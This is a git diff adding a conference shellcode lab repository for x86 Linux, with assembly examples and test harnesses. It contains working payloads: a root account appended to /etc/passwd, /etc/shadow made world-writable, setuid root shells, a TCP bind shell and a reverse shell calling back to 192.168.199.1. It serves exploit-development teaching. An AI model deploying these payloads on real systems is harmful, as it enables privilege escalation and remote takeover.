diff --git a/README b/README
new file mode 100644
index 0000000..1772dd2
--- /dev/null
+++ b/README
@@ -0,0 +1,16 @@
+  _____ __ __    ___  _      _        __   ___   ___      ___        _       ____  ____  
+ / ___/|  |  |  /  _]| |    | |      /  ] /   \ |   \    /  _]      | |     /    ||    \ 
+(   \_ |  |  | /  [_ | |    | |     /  / |     ||    \  /  [_ _____ | |    |  o  ||  o  )
+ \__  ||  _  ||    _]| |___ | |___ /  /  |  O  ||  D  ||    _]     || |___ |     ||     |
+ /  \ ||  |  ||   [_ |     ||     /   \_ |     ||     ||   [_|_____||     ||  _  ||  O  |
+ \    ||  |  ||     ||     ||     \     ||     ||     ||     |      |     ||  |  ||     |
+  \___||__|__||_____||_____||_____|\____| \___/ |_____||_____|      |_____||__|__||_____|
+                                                                                         
+
+Collection of Shellcode Lab Sessions at from different cons the past years. Consists of PDF Slides and Example codes.
+
+x86_32 - This is the Shellcode Lab for IA-32 saying 32Bit Intel CPUs
+x86_64 - This is the Shellcode Lab for IA-64 saying 64Bit Intel CPUs
+
+Cheers
+dash
diff --git a/x86_32/0x1_SycallBasics/0x1_Shellcode-Lab_32Bit_Basics.pdf b/x86_32/0x1_SycallBasics/0x1_Shellcode-Lab_32Bit_Basics.pdf
new file mode 100644
index 0000000..691a7b2
Binary files /dev/null and b/x86_32/0x1_SycallBasics/0x1_Shellcode-Lab_32Bit_Basics.pdf differ
diff --git a/x86_32/0x1_SycallBasics/Example_Code/adduser_etc_passwd.asm b/x86_32/0x1_SycallBasics/Example_Code/adduser_etc_passwd.asm
new file mode 100644
index 0000000..2c47e1c
--- /dev/null
+++ b/x86_32/0x1_SycallBasics/Example_Code/adduser_etc_passwd.asm
@@ -0,0 +1,53 @@
+; shellcode lab @ hack4
+; dash
+
+BITS 32
+global _start
+
+_start:
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+
+mov eax, 5
+push ebx
+push    0x64777373
+push    0x61702f63
+push    0x74652f2f
+mov ebx, esp
+mov ecx, 0x401
+int 0x80
+
+; take filedescriptor
+xor ebx, ebx
+mov ebx, eax
+
+; write(f_open, line, 24)
+xor eax, eax
+xor ecx, ecx
+mov eax, 4
+
+push    ecx
+push byte 0x0a
+push    0x68736162
+push    0x2f6e6962
+push    0x2f3a746f
+push    0x6f722f3a
+push    0x3a303a30
+push    0x3a494e73
+push    0x386b5a39
+push    0x65736d48
+push    0x42413a72
+push    0x336b6361
+push    0x68316f6e
+mov     ecx, esp
+mov edx, 45
+int 0x80
+
+;close maybe?? ah forget that :>
+
+; exit(23)
+mov eax, 1
+mov ebx, 23
+int 0x80
+
diff --git a/x86_32/0x1_SycallBasics/Example_Code/ascii_converter.py b/x86_32/0x1_SycallBasics/Example_Code/ascii_converter.py
new file mode 100644
index 0000000..ef0e2e2
--- /dev/null
+++ b/x86_32/0x1_SycallBasics/Example_Code/ascii_converter.py
@@ -0,0 +1,21 @@
+#!/usr/bin/env python
+#
+# ascii converter for shellcoding-lab at hack4
+# ~dash in 2014
+#
+
+import sys
+import binascii
+
+text = sys.argv[1]
+
+def usage():
+	print "./%s <string2convert>" % (sys.argv[0])
+if len(sys.argv)<2:
+	usage()
+	exit()
+
+val = binascii.hexlify(text[::-1])
+
+print "Stringlen: %d" % len(text)
+print "String: %s" % val
diff --git a/x86_32/0x1_SycallBasics/Example_Code/ascii_converter2.py b/x86_32/0x1_SycallBasics/Example_Code/ascii_converter2.py
new file mode 100644
index 0000000..b169d52
--- /dev/null
+++ b/x86_32/0x1_SycallBasics/Example_Code/ascii_converter2.py
@@ -0,0 +1,29 @@
+#!/usr/bin/env python
+
+import sys
+import binascii
+
+text = sys.argv[1]
+
+def usage():
+		print "./%s <string2convert>" % (sys.argv[0])
+if len(sys.argv)<2:
+		usage()
+		exit()
+
+val = binascii.hexlify(text[::-1])
+
+print "Stringlen: %d" % len(text)
+print "String: %s" % val
+print
+for i in range(len(val)):
+		if i % 8 == 0:
+				print "push	 0x",
+
+		print "\b%c" % val[i],
+		i=i+1
+		k = i % 8
+		if k == 0:
+				print
+
+				
diff --git a/x86_32/0x1_SycallBasics/Example_Code/bad_setuid_shell.asm b/x86_32/0x1_SycallBasics/Example_Code/bad_setuid_shell.asm
new file mode 100644
index 0000000..558f180
--- /dev/null
+++ b/x86_32/0x1_SycallBasics/Example_Code/bad_setuid_shell.asm
@@ -0,0 +1,21 @@
+global _start
+
+section .text
+_start:
+
+;setuid
+xor     eax, eax
+mov     ebx, eax
+mov     eax, 11
+int     0x80
+
+;execve
+xor     ecx, ecx
+push    ecx
+push    0x69732f2f
+push    0x6e69622f
+mov     ebx, esp
+mov     edx, 0x00000000
+xor     eax, eax
+mov     eax, 11
+int     0x80
diff --git a/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_0bytes.asm b/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_0bytes.asm
new file mode 100644
index 0000000..e5b7007
--- /dev/null
+++ b/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_0bytes.asm
@@ -0,0 +1,27 @@
+; shellcodelab@hack4
+; by dash
+
+BITS 32
+global _start
+
+_start:
+xor     eax, eax
+xor     ebx, ebx
+xor     ecx, ecx
+
+;chmod
+mov     ecx, 0x1ff      ;0777
+push    ebx             ;null terminator
+push    0x776f6461      ;/etc/shadow
+push    0x68732f63
+push    0x74652f2f
+mov     ebx, esp        ;put the address of esp to ebx (shadow)
+mov     eax, 15
+int     0x80
+
+;exit
+xor     eax, eax
+xor     ebx, ebx
+mov     eax, 1
+int     0x80
+
diff --git a/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_no0.asm b/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_no0.asm
new file mode 100644
index 0000000..80127bc
--- /dev/null
+++ b/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_no0.asm
@@ -0,0 +1,26 @@
+; shellcode-lab@hack4
+; by dash
+
+BITS 32
+global _start
+
+_start:
+xor     eax, eax
+xor     ebx, ebx
+xor     ecx, ecx
+
+;chmod
+mov     cx, 0x1ff       ;0777
+push    ebx             ;null terminator
+push    0x776f6461      ;/etc/shadow
+push    0x68732f63
+push    0x74652f2f
+mov     ebx, esp        ;put the address of esp to ebx (shadow)
+mov     al, 15
+int     0x80
+
+;exit
+xor     eax, eax
+xor     ebx, ebx
+mov     al, 1
+int     0x80
diff --git a/x86_32/0x1_SycallBasics/Example_Code/crypt_des_tool.py b/x86_32/0x1_SycallBasics/Example_Code/crypt_des_tool.py
new file mode 100644
index 0000000..df68606
--- /dev/null
+++ b/x86_32/0x1_SycallBasics/Example_Code/crypt_des_tool.py
@@ -0,0 +1,19 @@
+#!/usr/bin/env python2
+#
+# crypt des tool for shellcoding lab at hack4
+# ~dash
+
+import sys
+import crypt
+
+def usage():
+    print "%s <password>" % (sys.argv[0])
+
+if len(sys.argv)<2:
+    usage()
+    exit()
+
+password = sys.argv[1]
+pw = crypt.crypt(password,'AB')
+print "Password: %s" % pw
+
diff --git a/x86_32/0x1_SycallBasics/Example_Code/shell.c b/x86_32/0x1_SycallBasics/Example_Code/shell.c
new file mode 100644
index 0000000..ac0e9d0
--- /dev/null
+++ b/x86_32/0x1_SycallBasics/Example_Code/shell.c
@@ -0,0 +1,20 @@
+/* 	shell.c
+	simple shell for shellcoding-lab at hack4 0x1
+	probably ripped somewhere
+	~dash
+*/
+
+#include <stdio.h>
+#include <unistd.h>
+#include <string.h>
+
+
+int main(){
+
+	char *args[2];
+
+	setuid(0);
+	args[0] = "/bin/sh";
+	args[1] = NULL;
+	execve(args[0], args, NULL);
+}
diff --git a/x86_32/0x1_SycallBasics/Example_Code/skeleton_mmap.c b/x86_32/0x1_SycallBasics/Example_Code/skeleton_mmap.c
new file mode 100644
index 0000000..d656446
--- /dev/null
+++ b/x86_32/0x1_SycallBasics/Example_Code/skeleton_mmap.c
@@ -0,0 +1,26 @@
+#include <string.h>
+#include <sys/mman.h>
+
+char shellcode[] = "";
+
+int main(int argc, char **argv)
+{
+  // Allocate some read-write memory
+  void *mem = mmap(0, sizeof(shellcode), PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+
+  // Copy the shellcode into the new memory
+  memcpy(mem, shellcode, sizeof(shellcode));
+
+  // Make the memory read-execute
+  mprotect(mem, sizeof(shellcode), PROT_READ|PROT_EXEC);
+
+  // Call the shellcode
+  int (*func)();
+  func = (int (*)())mem;
+  (int)(*func)();
+
+  // Now, if we managed to return here, it would be prudent to clean up the memory:
+  munmap(mem, sizeof(shellcode));
+
+  return 0;
+}
diff --git a/x86_32/0x1_SycallBasics/Example_Code/skeleton_oldstyle.c b/x86_32/0x1_SycallBasics/Example_Code/skeleton_oldstyle.c
new file mode 100644
index 0000000..cc3f9dc
--- /dev/null
+++ b/x86_32/0x1_SycallBasics/Example_Code/skeleton_oldstyle.c
@@ -0,0 +1,15 @@
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+
+char shellcode[] = "";
+
+int main(void)
+{
+ int *ret;
+
+    printf("%d\n",strlen(shellcode));
+    ret = (int *)&ret+2;
+    *ret = (int)shellcode;
+return 0;
+}
diff --git a/x86_32/0x2_NetworkShells/0x2_ShellcodeLab_32Bit_NetworkShells.pdf b/x86_32/0x2_NetworkShells/0x2_ShellcodeLab_32Bit_NetworkShells.pdf
new file mode 100644
index 0000000..6c36c59
Binary files /dev/null and b/x86_32/0x2_NetworkShells/0x2_ShellcodeLab_32Bit_NetworkShells.pdf differ
diff --git a/x86_32/0x2_NetworkShells/bindshell_tcp/bindtcp.asm b/x86_32/0x2_NetworkShells/bindshell_tcp/bindtcp.asm
new file mode 100644
index 0000000..743b3bd
--- /dev/null
+++ b/x86_32/0x2_NetworkShells/bindshell_tcp/bindtcp.asm
@@ -0,0 +1,115 @@
+BITS 32
+global _start
+
+; basic bindshell for shellcode lab
+; by dash
+
+_start:
+; all syscalls /usr/include/i386-linux-gnu/asm/unistd_32.h
+; in difference we have to specify everything via socketcall
+; int socketcall(int call, unsigned long *args);
+; 66h / 102 is socketcall
+; /usr/include/linux/net.h
+
+; we need a socket, PF_INET, SOCK_STREAM, IPPROTO
+; its *not* sys/socket
+; go to /usr/include/bits/socket.h for domain
+; go to /usr/include/bits/socket_type.h for type
+; go to /usr/include/netinet/in.h for protocol
+
+; define socket
+xor		eax, eax		; clean accumulator
+xor		ebx, ebx
+xor		edx, edx	; prepare edx for null
+mov		al, 0x66
+mov		bl, 0x1		; SYS_SOCKET (/usr/include/linux/net.h) 
+push	edx			; IPPROTO == 0
+push	0x1			; SOCK_STREAM == 1
+push	0x2			; AF_INET / PF_INET == 2
+mov		ecx,esp
+int		0x80
+
+; define bind
+; EAX has socket fd
+; /usr/include/linux/in.h
+; #define __SOCK_SIZE__   16      /* sizeof(struct sockaddr)  */
+; typedef unsigned short int sa_family_t;
+; struct sockaddr {
+; sa_family_t sa_family;		unsigned short int 2 byte
+; char        sa_data[14]; }
+
+; we do not want to specify a special ip address
+; we simply define 0.0.0.0 with nulled register
+xchg	edi, eax
+push 	edx				; 0.0.0.0
+push	word 0x0A1A		; PORT 6666
+push	word 0x2		; AF_INET, sin_family
+mov		ecx, esp		; struct sockaddr *addr
+mov		esi, ecx		; save struct sockaddr for later use in ESI
+push	0x10			; socklen_t addrlen
+push	ecx				; sockaddr *addr
+push	edi				; socket fd
+mov		ecx, esp
+mov		bl,0x2			; SYS_BIND
+xor		eax, eax		; clean accumulator
+mov		al,0x66			; SYS_SOCKETCALL
+int		0x80
+
+; define listen
+; do socketcall
+; SYS_LISTEN 4
+; int listen(int sockfd, int backlog);
+; 
+xor		eax, eax
+mov		al,0x66		; SYS_SOCKETCALL
+mov		bl,0x4		; SYS_LISTEN, 1st Argument to SYS_SOCKETCALL
+push	0x1			; backlog
+push	edi			; sockfd
+mov		ecx, esp	; 2nd argument to SYS_SOCKETCALL
+int		0x80
+
+; define accept
+; SYS_ACCEPT 5
+; int accept(int sockfd, struct sockaddr *addr,socklen_t *addrlen);
+; addr + addrlen for client, but we dont care about that
+
+xor		eax, eax		; clean accumulator
+mov		al,0x66
+mov		bl,0x5
+push	edx				; flags, null
+push	edx
+push	edi
+mov		ecx, esp
+int		0x80
+
+; define dup2
+; dup2 duplicate the FDs to the shell 
+; new sockfd is in EAX
+; int dup2(int oldfd, int newfd);
+
+xor		ecx, ecx
+mov		cl,0x2
+xchg	ebx,eax
+loop:
+xor		eax, eax		; clean accumulator
+mov		al,0x3F
+int		0x80
+dec		ecx
+jns		loop		; if ecx is *not* -1 (SIGN Flag)
+
+; define execve
+; spawning a shell
+; int execve(const char *filename, char *const argv[], char *const envp[]);
+; 
+
+xor		eax, eax		; clean accumulator
+xor		esi, esi
+push 	esi
+mov		edx, esp		; 3rd argument
+push	esi				; NULL 
+push	0x68732f6e		; n/sh
+push	0x69622f2f		; //bi
+mov		ebx, esp		; 1st argument
+mov		ecx, edx		; 2nd argument
+mov		al,0xb
+int		0x80
diff --git a/x86_32/0x2_NetworkShells/bindshell_tcp/build_x86.sh b/x86_32/0x2_NetworkShells/bindshell_tcp/build_x86.sh
new file mode 100644
index 0000000..b51f6a9
--- /dev/null
+++ b/x86_32/0x2_NetworkShells/bindshell_tcp/build_x86.sh
@@ -0,0 +1,15 @@
+#!/bin/bash
+# easy build script for shellcode class
+
+if [ $# -ne 1 ];
+then
+echo "what is the name of the sourcefile, without .asm please"
+exit
+fi
+
+name=$1
+
+nasm -f elf32 $name.asm -o $name.o;ld -m elf_i386 -o $name $name.o
+md5sum $name
+ls -al $name
+echo "Done"
diff --git a/x86_32/0x2_NetworkShells/bindshell_tcp/testit.c b/x86_32/0x2_NetworkShells/bindshell_tcp/testit.c
new file mode 100644
index 0000000..7e800e4
--- /dev/null
+++ b/x86_32/0x2_NetworkShells/bindshell_tcp/testit.c
@@ -0,0 +1,12 @@
+#include <stdio.h>
+
+unsigned char shellcode[] = \
+"\x31\xc0\x31\xdb\x31\xd2\xb0\x66\xb3\x01\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x97\x52\x66\x68\x1a\x0a\x66\x6a\x02\x89\xe1\x89\xce\x6a\x10\x51\x57\x89\xe1\xb3\x02\x31\xc0\xb0\x66\xcd\x80\x31\xc0\xb0\x66\xb3\x04\x6a\x01\x57\x89\xe1\xcd\x80\x31\xc0\xb0\x66\xb3\x05\x52\x52\x57\x89\xe1\xcd\x80\x31\xc9\xb1\x02\x93\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7\x31\xc0\x31\xf6\x56\x89\xe2\x56\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xb0\x0b\xcd\x80";
+main()
+{
+printf("Shellcode Length:  %d\n", sizeof(shellcode) - 1);
+int (*ret)() = (int(*)())shellcode;
+ret();
+}
+
+
diff --git a/x86_32/0x2_NetworkShells/reverseshell_tcp/build_x86.sh b/x86_32/0x2_NetworkShells/reverseshell_tcp/build_x86.sh
new file mode 100644
index 0000000..b51f6a9
--- /dev/null
+++ b/x86_32/0x2_NetworkShells/reverseshell_tcp/build_x86.sh
@@ -0,0 +1,15 @@
+#!/bin/bash
+# easy build script for shellcode class
+
+if [ $# -ne 1 ];
+then
+echo "what is the name of the sourcefile, without .asm please"
+exit
+fi
+
+name=$1
+
+nasm -f elf32 $name.asm -o $name.o;ld -m elf_i386 -o $name $name.o
+md5sum $name
+ls -al $name
+echo "Done"
diff --git a/x86_32/0x2_NetworkShells/reverseshell_tcp/revtcp.asm b/x86_32/0x2_NetworkShells/reverseshell_tcp/revtcp.asm
new file mode 100644
index 0000000..f4ef91d
--- /dev/null
+++ b/x86_32/0x2_NetworkShells/reverseshell_tcp/revtcp.asm
@@ -0,0 +1,78 @@
+BITS 32
+global _start
+
+; basic reverseshell for shellcode lab
+; by dash
+
+_start:
+; all syscalls /usr/include/i386-linux-gnu/asm/unistd_32.h
+; in difference we have to specify everything via socketcall
+; int socketcall(int call, unsigned long *args);
+; 66h / 102 is socketcall
+; /usr/include/linux/net.h
+
+; we need a socket, PF_INET, SOCK_STREAM, IPPROTO
+; its *not* sys/socket
+; go to /usr/include/bits/socket.h for domain
+; go to /usr/include/bits/socket_type.h for type
+; go to /usr/include/netinet/in.h for protocol
+
+; define socket
+xor		eax, eax	; clean accumulator
+xor		ebx, ebx	; clean it as well
+xor		edx, edx	; prepare edx for null
+mov		al, 0x66	; put 102 into AL, sys_socketcall
+mov		bl, 0x1		; SYS_SOCKET (/usr/include/linux/net.h) 
+push	edx			; IPPROTO == 0
+push	0x1			; SOCK_STREAM == 1
+push	0x2			; AF_INET / PF_INET == 2
+mov		ecx,esp
+int		0x80
+
+; connect
+; call is basically the same as bind
+;xchg	edi, eax
+push 	0x01C7A8C0		; 192.168.199.1
+push	word 0x0A1A		; PORT 6666
+push	word 0x2		; AF_INET, sin_family
+mov		ecx, esp		; struct sockaddr *addr
+mov		esi, ecx		; save struct sockaddr for later use in ESI
+push	0x10			; socklen_t addrlen
+push	ecx				; sockaddr *addr
+push	edi				; socket fd
+mov		ecx, esp
+mov		bl,0x3			; SYS_CONNECT
+xor		eax, eax		; clean accumulator
+mov		al,0x66			; SYS_SOCKETCALL
+int		0x80
+; define dup2
+; dup2 duplicate the FDs to the shell 
+; new sockfd is in EAX
+; int dup2(int oldfd, int newfd);
+
+xor		ecx, ecx
+mov		cl,0x2
+mov		ebx,edi
+loop:
+xor		eax, eax		; clean accumulator
+mov		al,0x3F
+int		0x80
+dec		ecx
+jns		loop		; if ecx is *not* -1 (SIGN Flag)
+
+; define execve
+; spawning a shell
+; int execve(const char *filename, char *const argv[], char *const envp[]);
+; 
+
+xor		eax, eax		; clean accumulator
+xor		esi, esi
+push 	esi
+mov		edx, esp		; 3rd argument
+push	esi				; NULL 
+push	0x68732f6e		; n/sh
+push	0x69622f2f		; //bi
+mov		ebx, esp		; 1st argument
+mov		ecx, edx		; 2nd argument
+mov		al,0xb
+int		0x80
diff --git a/x86_32/0x2_NetworkShells/reverseshell_tcp/testit.c b/x86_32/0x2_NetworkShells/reverseshell_tcp/testit.c
new file mode 100644
index 0000000..ee39770
--- /dev/null
+++ b/x86_32/0x2_NetworkShells/reverseshell_tcp/testit.c
@@ -0,0 +1,12 @@
+#include <stdio.h>
+
+unsigned char shellcode[] = \
+"\x31\xc0\x31\xdb\x31\xd2\xb0\x66\xb3\x01\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x97\x52\x66\x68\x1b\x0a\x66\x6a\x02\x89\xe1\x89\xce\x6a\x10\x51\x57\x89\xe1\xb3\x02\x31\xc0\xb0\x66\xcd\x80\x68\xc0\xa8\xc7\x67\x66\x68\x1a\x0a\x66\x6a\x02\x89\xe1\x89\xce\x6a\x10\x51\x57\x89\xe1\xb3\x03\x31\xc0\xb0\x66\xcd\x80\x31\xc9\xb1\x02\x89\xfb\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7\x31\xc0\x31\xf6\x56\x89\xe2\x56\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xb0\x0b\xcd\x80";
+main()
+{
+printf("Shellcode Length:  %d\n", sizeof(shellcode) - 1);
+int (*ret)() = (int(*)())shellcode;
+ret();
+}
+
+
diff --git a/x86_64/Example_Code/8bit.asm b/x86_64/Example_Code/8bit.asm
new file mode 100644
index 0000000..cd3f45a
--- /dev/null
+++ b/x86_64/Example_Code/8bit.asm
@@ -0,0 +1,18 @@
+; 8 bit registers 'undocumented', test
+; dash@hack4.org
+; May 2016 
+;
+; wikipedia, shellcode trainings no access to certain cpu registers in 8 bit mode
+; however, they are addressable
+; just adding right now a l to 16bit registers
+;
+
+BITS 64
+
+global _start
+_start:
+
+mov spl, 1
+mov bpl, 2
+mov sil, 3
+mov dil, 4
diff --git a/x86_64/Example_Code/byte_placement_r10.asm b/x86_64/Example_Code/byte_placement_r10.asm
new file mode 100644
index 0000000..caa4fa6
--- /dev/null
+++ b/x86_64/Example_Code/byte_placement_r10.asm
@@ -0,0 +1,22 @@
+; shellcode-lab64bit
+; dash@hack4.org
+; byte placements on 64 bit - example for new register r10
+BITS 64
+global _start
+
+_start:
+
+; former general purpose register
+sub r10, r10
+
+mov	r10, 0x4142434445464748
+sub r10, r10
+
+mov r10d, 0x41424344
+sub r10d, r10d
+
+mov r10w, 0x4142
+sub r10w, r10w
+
+mov r10b,0x42
+sub r10b, r10b
diff --git a/x86_64/Example_Code/byte_placement_rax.asm b/x86_64/Example_Code/byte_placement_rax.asm
new file mode 100644
index 0000000..a470393
--- /dev/null
+++ b/x86_64/Example_Code/byte_placement_rax.asm
@@ -0,0 +1,28 @@
+; shellcode-lab64bit
+; dash@hack4.org
+; byte placements on 64 bit - example
+BITS 64
+global _start
+
+_start:
+
+; former general purpose register, example
+; sub is used to clear out the register
+sub rax, rax
+
+mov	rax, 0x4142434445464748
+sub rax, rax
+
+mov eax, 0x41424344
+sub eax, eax
+
+; address 16bit
+mov ax, 0x4142
+
+; overwrite the higher byte of ax
+; 0x4142 gets to 0x2d42
+mov ah,0x2d
+sub ah, ah
+
+mov al,0x41
+sub al, al
diff --git a/x86_64/Example_Code/clear_register.asm b/x86_64/Example_Code/clear_register.asm
new file mode 100644
index 0000000..b17424f
--- /dev/null
+++ b/x86_64/Example_Code/clear_register.asm
@@ -0,0 +1,22 @@
+; shellcode-lab64 
+; dash@hack4.org
+;
+
+; some example to zero-out a register
+BITS 64
+global _start
+_start:
+
+xor rax, rax	; initial clearing - classic xor
+mov rax, 0xDEADBEEF
+sub rax, rax    ; sub opcode
+
+mov rax, 0xF00DBABE
+xor rax, rax	; classic xor
+
+; check value of register and add or sub from that
+; let's assume 29A is in the register rcx
+sub rcx, rcx
+mov rcx, 0x29A
+sub rcx, 666 
+; zero'd
diff --git a/x86_64/Example_Code/execve.asm b/x86_64/Example_Code/execve.asm
new file mode 100644
index 0000000..ba4b909
--- /dev/null
+++ b/x86_64/Example_Code/execve.asm
@@ -0,0 +1,21 @@
+BITS 64
+global _start
+
+_start:
+
+xor rax, rax
+
+push	rax 					; null terminator for the string
+mov 	rbx, 0x68732f6e69622f2f ; //bin/sh backwards
+push 	rbx 					;
+mov 	rdi, rsp				; move address from stack pointer to first argument
+
+push	rax
+push	rdi						; actually we would not need this one
+mov		rsi, rsp				; move the address to the 2nd argument
+
+mov		rdx, rax				; no envp necessary
+
+mov		al,0x3B					; execve into rax
+
+syscall
diff --git a/x86_64/Example_Code/execve_setuid.asm b/x86_64/Example_Code/execve_setuid.asm
new file mode 100644
index 0000000..5cf7cab
--- /dev/null
+++ b/x86_64/Example_Code/execve_setuid.asm
@@ -0,0 +1,29 @@
+BITS 64
+global _start
+
+_start:
+
+xor rax, rax
+push rax						; push the cleared register
+pop rdi							; pop the zer0z into 1st argument
+
+add	   al,0x69					; setuid 105 or 0x69h
+syscall							; call setuid(0)
+
+
+xor rax, rax
+
+push	rax 					; null terminator for the string
+mov 	rbx, 0x68732f6e69622f2f ; //bin/sh backwards
+push 	rbx 					;
+mov 	rdi, rsp				; move address from stack pointer to first argument
+
+push	rax
+push	rdi						; actually we would not need this one
+mov		rsi, rsp				; move the address to the 2nd argument
+
+mov		rdx, rax				; no envp necessary
+
+mov		al,0x3B					; execve into rax
+
+syscall
diff --git a/x86_64/Example_Code/exit.asm b/x86_64/Example_Code/exit.asm
new file mode 100644
index 0000000..a038f6e
--- /dev/null
+++ b/x86_64/Example_Code/exit.asm
@@ -0,0 +1,14 @@
+; shellcode lab 64Bit
+; exit example as it should be ;)
+; dsah@hack4.org
+; 
+BITS 64
+global _start
+
+_start:
+
+xor		rax,rax
+xor		rdx,rdx
+mov		al,0x3C
+mov		dil,4
+syscall
diff --git a/x86_64/Example_Code/exit_nulls.asm b/x86_64/Example_Code/exit_nulls.asm
new file mode 100644
index 0000000..2ed69e0
--- /dev/null
+++ b/x86_64/Example_Code/exit_nulls.asm
@@ -0,0 +1,16 @@
+; shellcode-lab 64Bit
+; dash@hack4.org
+; exit code with null bytes
+;
+
+BITS 64
+
+global _start
+
+_start:
+
+xor		rax,rax
+xor		rdx,rdx
+mov		rax,0x3C
+mov		rdx,4
+syscall
diff --git a/x86_64/Example_Code/kill.asm b/x86_64/Example_Code/kill.asm
new file mode 100644
index 0000000..9289643
--- /dev/null
+++ b/x86_64/Example_Code/kill.asm
@@ -0,0 +1,27 @@
+; shellcode-lab 64Bit
+; dash@hack4.org
+; kill + exit
+; 
+
+
+BITS 64
+global _start
+
+_start:
+
+xor rax, rax
+xor rdi, rdi
+xor rsi, rsi
+
+
+mov dil, 1368
+mov sil,9
+mov al, 62
+syscall
+
+xor rax, rax
+xor rdi, rdi
+
+add dil, 4
+mov al, 60
+syscall
diff --git a/x86_64/Example_Code/kill_noexit.asm b/x86_64/Example_Code/kill_noexit.asm
new file mode 100644
index 0000000..cdf2db3
--- /dev/null
+++ b/x86_64/Example_Code/kill_noexit.asm
@@ -0,0 +1,18 @@
+; shellcode-lab64bit
+; dash@hack4.org
+; don't execute that as root, as long as adjusted
+;
+
+BITS 64
+global _start
+
+_start:
+
+xor rax, rax
+xor rdi, rdi
+xor rsi, rsi
+
+mov dil, 1 ; you might not want to run that as root
+mov sil,9
+mov al, 62
+syscall
diff --git a/x86_64/Example_Code/push.asm b/x86_64/Example_Code/push.asm
new file mode 100644
index 0000000..15ee9ec
--- /dev/null
+++ b/x86_64/Example_Code/push.asm
@@ -0,0 +1,16 @@
+; shellcode-lab64 
+; dash@hack4.org
+; push example and 8byte fun on 64bit architecture
+;
+
+BITS 64
+
+global _start
+_start:
+
+push byte 0x41
+push word 0x4142
+push dword 0x41424344
+; let's comment that out
+; comment it in to see the compile error
+;push 0x4142434445464748
diff --git a/x86_64/Example_Code/push_mov.asm b/x86_64/Example_Code/push_mov.asm
new file mode 100644
index 0000000..44e4e1a
--- /dev/null
+++ b/x86_64/Example_Code/push_mov.asm
@@ -0,0 +1,14 @@
+; shellcode-lab64 
+; dash@hack4.org
+; push example and 8byte fun on 64bit architecture
+; use mov to bring up your 8byte value on the stack
+; 
+
+BITS 64
+
+global _start
+_start:
+
+xor rax, rax ; clear register
+mov rax, 0x4142434445464748 ; place 8byte in register rax
+push rax                    ; push it onto the stack
diff --git a/x86_64/Example_Code/skeleton.c b/x86_64/Example_Code/skeleton.c
new file mode 100644
index 0000000..780761b
--- /dev/null
+++ b/x86_64/Example_Code/skeleton.c
@@ -0,0 +1,17 @@
+/* shellcode-lab 64Bit 
+   dash@hack4.org
+   
+   use -z execstack
+   or set char code to const
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] ="shellcode wants to be placed here!";
+main()
+{
+   printf("Shellcode Len: %d\n", (int)strlen(code));
+   int (*ret)() = (int(*)())code;
+   ret();
+}
diff --git a/x86_64/Example_Code/xchg.asm b/x86_64/Example_Code/xchg.asm
new file mode 100644
index 0000000..990a523
--- /dev/null
+++ b/x86_64/Example_Code/xchg.asm
@@ -0,0 +1,20 @@
+; xchg example code
+; dash@hack4.org
+; shellcode lab
+; may 2016
+
+BITS 64
+global _start
+
+_start:
+
+xor rax, rax
+xor rbx, rbx
+
+mov rax, 0x29A ; http://web.textfiles.com/ezines/29A/
+mov rbx, 0x539
+mov r10, 0xBEEFBEEFBEEFBEEF
+xchg rax, r10
+xchg r10, r9
+xchg rbx, rax
+xchg rdi,rsp
diff --git a/x86_64/Shellcode-Lab64_0x01.pdf b/x86_64/Shellcode-Lab64_0x01.pdf
new file mode 100644
index 0000000..497f348
Binary files /dev/null and b/x86_64/Shellcode-Lab64_0x01.pdf differ